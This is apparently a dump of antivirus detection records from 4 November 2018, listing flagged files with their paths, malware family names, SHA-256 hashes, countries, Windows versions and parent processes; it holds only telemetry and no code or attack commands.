  Row(detection=Row(filename='hrl136.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl136.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl108.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl108.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl14c.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl14C.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl1a7.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl1A7.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl11f.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl11F.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl1a8.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl1A8.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl17.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl17.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl165.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl165.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl161.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl161.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl18d.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl18D.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl17b.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl17B.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='llm2.exe', filepath='\\\\?\\D:\\programme\\LM\\Win32\\lLM2.exe', filesize=832000, name='HEUR/APC.#M1.#R1'), hash='c113eda2d6e9ab79b40ef15ec2ccda2ffe3cb82ae63a18d5ccf7e477832d9170', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='c11ef2e3839d2c5ac03b9446d7f3d04ae70c729b90f76c2016186d6f6eb807ad', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T06:27:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-101712-d4185938', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4bd1c27a\\AVSCAN-20181104-094549-CD63F461\\AVSCAN-20181104-101712-D4185938', filesize=192000, name='TR/Black.Gen2.#M1.#R1'), hash='c15c2e2cd3be99c131bbb675597af96d818cc6331b201dd95f73f3dd7a0eba2c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:17:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214641-0bbf93a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214641-0BBF93A5', filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:46:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='icaredatarecovery.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\iCareDataRecovery.exe', filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:30:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c2059fc525c035ac4f3adb8f992ce1815d8e867d9cf52fd09bde4b49f4229aae', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C2059FC525C035AC4F3ADB8F992CE1815D8E867D9CF52FD09BDE4B49F4229AAE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c2059fc525c035ac4f3adb8f992ce1815d8e867d9cf52fd09bde4b49f4229aae', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:25:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c295276d613ba5bef8d92ef54311297939568d1ccbb8090577561363df774b15', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C295276D613BA5BEF8D92EF54311297939568D1CCBB8090577561363DF774B15', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='c295276d613ba5bef8d92ef54311297939568d1ccbb8090577561363df774b15', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:41:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:33:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:34:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:33:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:34:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:34:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:33:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fffaaccddffaaccddffaacccddffaaccdffaaccdffaaccdfffa.fffaaccddffaaccddffaacccddffaaccdffaaccdffaaccdfffa', filepath='i:\\\xa0\\fffaaccddffaaccddffaacccddffaaccdffaaccdffaaccdfffa.fffaaccddffaaccddffaacccddffaaccdffaaccdffaaccdfffa', filesize=7616000, name='TR/Crypt.ZPACK.Gen7.#M300.#R604114'), hash='c31f7f577dfb7346855a64f5ecf3949acf4d4b8b9c9f3f714b2fb2815be8e7a0', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:06:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='84b74c2918260a0cda2e6cb0ba2b2d5013549140', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\84b74c2918260a0cda2e6cb0ba2b2d5013549140', filesize=320000, name='Adware/DealPly.c389db.#M1.#R1'), hash='c389dbd782215ca3380f9352dcbdbbffcbf7b3e7a35f44c4e737342e703c4585', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:45:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c3beb124d478202777dbf55dceb59bb06d75b07a597bcc3a040f208acbc4a91e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\C3BEB124D478202777DBF55DCEB59BB06D75B07A597BCC3A040F208ACBC4A91E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c3beb124d478202777dbf55dceb59bb06d75b07a597bcc3a040f208acbc4a91e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:18:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gplot.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\icemcfd\\win64_amd\\bin\\gplot.exe', filesize=384000, name='W32/Ramnit.CD.#M1.#R1'), hash='c401e13e7cadebbb2643eee40e9265fda2d2dc576841233596966f26a6f24ec4', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:12:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c4764c8e6ae4e4314739df37720893e477a78d604f7dc20669f31faddc6e3542', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C4764C8E6AE4E4314739DF37720893E477A78D604F7DC20669F31FADDC6E3542', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c4764c8e6ae4e4314739df37720893e477a78d604f7dc20669f31faddc6e3542', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:08:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dcbafedcbaafedcbafedcbaafedcbafedcbaafedcbfecbfdbbafedcbafeee.dcbafedcbaafedcbafedcbaafedcbafedcbaafedcbfecbfdbbafedcbafeee', filepath='\\?\\J:\\\xa0\\dcbafedcbaafedcbafedcbaafedcbafedcbaafedcbfecbfdbbafedcbafeee.dcbafedcbaafedcbafedcbaafedcbafedcbaafedcbfecbfdbbafedcbafeee', filesize=7936000, name='TR/Crypt.ZPACK.Gen7.#M300.#R604114'), hash='c4b72ecad35ec5863d9c7fb15d047fd6c972c5585f7891c55808e568a5a7b07c', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:24:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125955-43a0d915', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_79e3c184\\AVSCAN-20181104-125933-419163B5\\AVSCAN-20181104-125955-43A0D915', filesize=384000, name='PUA/CoinMiner.Gen.#M300.#R8197'), hash='c4bb691a7e52ed126caf3abf852c8e9bbde91cb37185b1d06e9acfb6f4379346', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00004e51', filepath='C:\\Windows\\Temp\\tmp00007c05\\tmp00004e51', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='c4c7b39b8c4e3fe75aef020c9220479ec080c2a18b45b8f6a7c82343b317565e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:41:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141352-9996e2b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8e3a5be7\\AVSCAN-20181104-141308-90EDABDA\\AVSCAN-20181104-141352-9996E2B7', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='c4cd3a36487e35ce02959549d2b1c013bea9b5b5cc764254261522448c70af7c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:13:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uchebnik grenadine 1.exe', filepath='D:\\Загрузки\\uchebnik grenadine 1.exe', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='c4cd3a36487e35ce02959549d2b1c013bea9b5b5cc764254261522448c70af7c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Total Commander\\TOTALCMD.EXE', parentsize=3737512, timestamp='2018-11-04T12:12:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c4e18b8671ccc1f9ba892713b0fbb1f592bdf4fdbedda079403ecdfe338517e0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\C4E18B8671CCC1F9BA892713B0FBB1F592BDF4FDBEDDA079403ECDFE338517E0', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='c4e18b8671ccc1f9ba892713b0fbb1f592bdf4fdbedda079403ecdfe338517e0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:20:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sp33649 help and support center.exe', filepath='\\\\?\\E:\\رعد خاص\\New folder\\رعد 1\\تعريف أشبي\\New Folder\\sp33649 Help and Support Center.exe', filesize=7524000, name='W32/Sality.AT.#M1.#R1'), hash='c591125f7eb22491d0efdf566c3eefd361dafb63e9c9d52fb0a71acb769acbbb', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:45:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133751-eb57c69c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-133708-E5EA1B84\\AVSCAN-20181104-133751-EB57C69C', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M300.#R100957'), hash='c5a6e66d84bf05ad574d2906fba114f0a0cff57c98b8098c93f7bd1e1536dcf1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:37:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msbrofc.com', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\msbrofc.com', filesize=64000, name='TR/Crypt.EPACK.Gen2.#M300.#R100957'), hash='c5a6e66d84bf05ad574d2906fba114f0a0cff57c98b8098c93f7bd1e1536dcf1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:36:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cap3onn.exe', filepath='D:\\c\\LBP1120_WinXP\\CAP3ONN.EXE', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='c66e4b6ec4ea9463378f9a53b333df3a8bd3cd832c64ceb25263a6032586baf1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T10:49:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-04T00:39:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-04T03:31:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-04T11:06:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\redstarpoker\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\redstarpoker\\mppoker.exe', parentsize=1214712, timestamp='2018-11-04T06:36:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jpsyyrym.exe', filepath='I:\\RECYCLER_DETEC (3)\\S-8-6-40-0336675170-6116534571-118242658-3858\\jpSyyrYm.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c6fc50ef3f9b385470e04b02fd9c605618a55c98414df30ca441da2f2948969b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T14:51:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jpsyyrym.exe', filepath='I:\\RECYCLER_DETEC (3)\\S-8-6-40-0336675170-6116534571-118242658-3858\\jpSyyrYm.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c6fc50ef3f9b385470e04b02fd9c605618a55c98414df30ca441da2f2948969b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T14:51:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090524-6f5e606e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-090524-6F5E606E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='c734a2651f32e3b9bbb167743dab8154bbeefdb89453fdf46214ca42affc01fb', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:05:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='115059913.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\115059913.exe', filesize=35056000, name='WORM/Alien.uqiib.#M1.#R1'), hash='c7ac889a8307930552202d90b7871bbaf0f0ed667230632d69dc2b994c033383', metadata=Row(cmdline='\\\\\\/DB', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T03:51:13Z'), dt=datetime.date(2018, 11, 4)),
